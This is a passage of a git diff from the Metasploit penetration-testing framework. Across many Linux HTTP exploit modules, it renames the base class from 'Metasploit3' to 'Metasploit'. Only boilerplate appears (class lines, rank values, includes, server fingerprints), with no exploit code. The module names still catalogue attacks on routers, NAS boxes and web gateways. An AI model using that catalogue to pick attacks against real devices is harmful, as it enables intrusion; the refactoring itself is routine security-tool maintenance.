:pattern => [ /DD-WRT/ ] } diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index d0fe19aec3..f80d659be9 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb index accdee0cdb..2058569b81 100644 --- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index 543ac2c857..83fb7054e0 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::Telnet include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb index d9a1f0ef17..34f5973486 100644 --- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb index 4470db0325..857a72eddf 100644 --- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb +++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index 314bc380bd..7cf088202e 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # Because only has been tested on a QEMU emulated environment HttpFingerprint = { :pattern => [ /Boa/ ] } diff --git a/modules/exploits/linux/http/dlink_dir615_up_exec.rb b/modules/exploits/linux/http/dlink_dir615_up_exec.rb index c2b8c13e31..3ac5ba97ed 100644 --- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb +++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb index 84e8fbe741..fdc7671ef0 100644 --- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb +++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index 914ba26974..f1a5a45145 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb index ef34cda681..ecf0215392 100644 --- a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index 70967ebe23..94926c60de 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb index 0d747ee3b8..a776035a85 100644 --- a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb index df5eab20f3..b2affba8b4 100644 --- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 5478e1f05c..3c93eea34e 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dreambox_openpli_shell.rb b/modules/exploits/linux/http/dreambox_openpli_shell.rb index b788d79503..3c89438681 100644 --- a/modules/exploits/linux/http/dreambox_openpli_shell.rb +++ b/modules/exploits/linux/http/dreambox_openpli_shell.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index 86c03e5227..ed30120065 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb index dbb7f728db..6735750190 100644 --- a/modules/exploits/linux/http/f5_icall_cmd.rb +++ b/modules/exploits/linux/http/f5_icall_cmd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/f5_icontrol_exec.rb b/modules/exploits/linux/http/f5_icontrol_exec.rb index a62532c29a..7c6960ac3f 100644 --- a/modules/exploits/linux/http/f5_icontrol_exec.rb +++ b/modules/exploits/linux/http/f5_icontrol_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb index da57034a85..8c11002d7b 100644 --- a/modules/exploits/linux/http/fritzbox_echo_exec.rb +++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb index 2c4caca16b..206d4c23cd 100644 --- a/modules/exploits/linux/http/gitlist_exec.rb +++ b/modules/exploits/linux/http/gitlist_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 1a1b961b1c..c7c9844b4b 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb index f3a9285a0b..0abb4a8233 100644 --- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } diff --git a/modules/exploits/linux/http/hp_system_management.rb b/modules/exploits/linux/http/hp_system_management.rb index 5ebaca92ab..36fda4521a 100644 --- a/modules/exploits/linux/http/hp_system_management.rb +++ b/modules/exploits/linux/http/hp_system_management.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] } diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb index d1911a1fd9..c623c60d4a 100644 --- a/modules/exploits/linux/http/kloxo_sqli.rb +++ b/modules/exploits/linux/http/kloxo_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb index 35eace8ecb..f37618a059 100644 --- a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb +++ b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index e46621bd2a..0cce50d09e 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb index c4d7219cd1..9ea7394dad 100644 --- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb index 16b771a9f4..663e18e626 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index 07ef38cb19..7825c2ee16 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb index 289ad49c36..815af49f6c 100644 --- a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb index 34f3ec1421..bd0be86066 100644 --- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/multi_ncc_ping_exec.rb b/modules/exploits/linux/http/multi_ncc_ping_exec.rb index 41bace5c42..1e8520a968 100644 --- a/modules/exploits/linux/http/multi_ncc_ping_exec.rb +++ b/modules/exploits/linux/http/multi_ncc_ping_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # Only tested on Emulated environment include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index f2b62feae3..4c2d33471c 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb index e4c2587641..31f53d4e5c 100644 --- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb index 6052481e8b..fa0db90e48 100644 --- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb index 2927c2bb20..e892a53e37 100644 --- a/modules/exploits/linux/http/netgear_readynas_exec.rb +++ b/modules/exploits/linux/http/netgear_readynas_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index d3bc972546..a7a8ad6dee 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index 8d08d715ac..a018a8f883 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb index 9c17429b93..36c7f0e337 100644 --- a/modules/exploits/linux/http/pandora_fms_sqli.rb +++ b/modules/exploits/linux/http/pandora_fms_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 870ee7fdc1..37dfefa63f 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb index d9cab6a7a3..5361907040 100644 --- a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb +++ b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pineapp_livelog_exec.rb b/modules/exploits/linux/http/pineapp_livelog_exec.rb index 94a67de146..7ae54192f6 100644 --- a/modules/exploits/linux/http/pineapp_livelog_exec.rb +++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb index 10111bb598..0f09dcf0cc 100644 --- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb +++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index bcb9e18bf2..208bc2f804 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index d6a748c00f..3e7134164a 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # It's backdooring the remote device include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb index 3cf0aafc86..90eaa8a0f3 100644 --- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 234cf47a2d..e0b06b1a2d 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index d06f0ab552..acd6094775 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb index f34b35bbf2..50906db54d 100644 --- a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index a98731bc11..2bc241de5a 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index 6a0538c640..cec0785760 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index b2f4258902..0f47445ae9 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb index dab96c8f57..5f2cbb4235 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_restore.rb b/modules/exploits/linux/http/symantec_web_gateway_restore.rb index 46fe21a41f..bb5ece4575 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 6a331e2b35..97fdea5371 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb index 0d9432b712..321375620f 100644 --- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb +++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index f645a359fc..d494e38b4b 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 3411f73fc1..631b1abdc5 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index af414339ba..617a0f8117 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index aaa3c51f36..9f5f6268bb 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index 782c427555..b080e015b7 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include 